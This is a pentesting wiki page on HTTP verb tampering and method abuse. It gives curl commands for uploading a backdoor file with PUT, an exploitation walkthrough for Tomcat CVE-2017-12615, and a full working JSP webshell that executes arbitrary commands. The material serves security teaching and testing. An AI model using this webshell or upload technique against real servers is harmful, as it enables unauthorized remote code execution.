The Hacker Recipes
GitHubTwitterDonate
Search…
Introduction
Active Directory
Reconnaissance
Movement
Persistence
Web services
Reconnaissance
Configuration
Default credentials
HTTP methods
HTTP security headers
Denial of Service (DoS)
🛠️ OAuth 2.0
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
HTTP methods

Theory

Verb tampering

Some websites filter access to resources but fail at filtering out all HTTP methods. When an attacker tries to access a resource with different methods (GET, POST, HEAD, etc.) to bypass the access control, this is called HTTP verb tampering.

Methods abuse

Some HTTP methods can be used for malicious purposes: PUT, DELETE, etc. The HTTP methods abuse is not aimed at gaining access to a specific page like verb tampering but more like what methods are accepted by the server and how can an attacker profit from those.

Practice

Recon

Testing for HTTP verb tampering and method abuse can be done with httpmethods.
1
httpmethods -u "https://target.url/"
2
httpmethods -u "https://target.url/restricted_page"
Copied!
A manual HTTP request with the OPTIONS method can also be used to enumerate what methods are supported. This works if the OPTIONS methods is allowed in the first place.
1
curl --include --request OPTIONS "https://target.url/"
Copied!

Abusing the PUT method

The PUT method can be used to upload arbitrary files. Some directories have different rights, it can be useful to test the method on a wide range of directories.
1
curl --include --upload-file "backdoor.php" "https://target.url/"
Copied!

Apache Tomcat JSP PUT - CVE-2017-12615

Abusing the PUT method also applies to CVE-2017-12615: When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the read-only initialization parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
Exploitation of this vulnerability can be achieved manually by creating a .jsp file and by uploading it to the target server.
test.jsp
1
<% out.write("<html><body><h3>JSP upload successfully</h3></body></html>"); %>
Copied!
1
curl --include --upload-file "test.jsp" "https://target.url/"
Copied!
If the upload is successful, the following JSP webshell (source) can then be uploaded to attempt at execute arbitrary commands on the remote server.
webshell.jsp
1
<%@ page import="java.util.*,java.io.*"%>
2
<HTML><BODY>
3
<FORM METHOD="GET" NAME="myform" ACTION="">
4
<INPUT TYPE="text" NAME="cmd">
5
<INPUT TYPE="submit" VALUE="Send">
6
</FORM>
7
<pre>
8
<%
9
if (request.getParameter("cmd") != null) {
10
out.println("Command: " + request.getParameter("cmd") + "<BR>");
11
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
12
OutputStream os = p.getOutputStream();
13
InputStream in = p.getInputStream();
14
DataInputStream dis = new DataInputStream(in);
15
String disr = dis.readLine();
16
while ( disr != null ) {
17
out.println(disr);
18
disr = dis.readLine();
19
}
20
}
21
%>
22
</pre>
23
</BODY></HTML>
Copied!
Previous
Default credentials
Next
HTTP security headers
Last modified 2mo ago
Copy link
Edit on GitHub
Contents
Theory
Verb tampering
Methods abuse
Practice
Recon
Abusing the PUT method
Apache Tomcat JSP PUT - CVE-2017-12615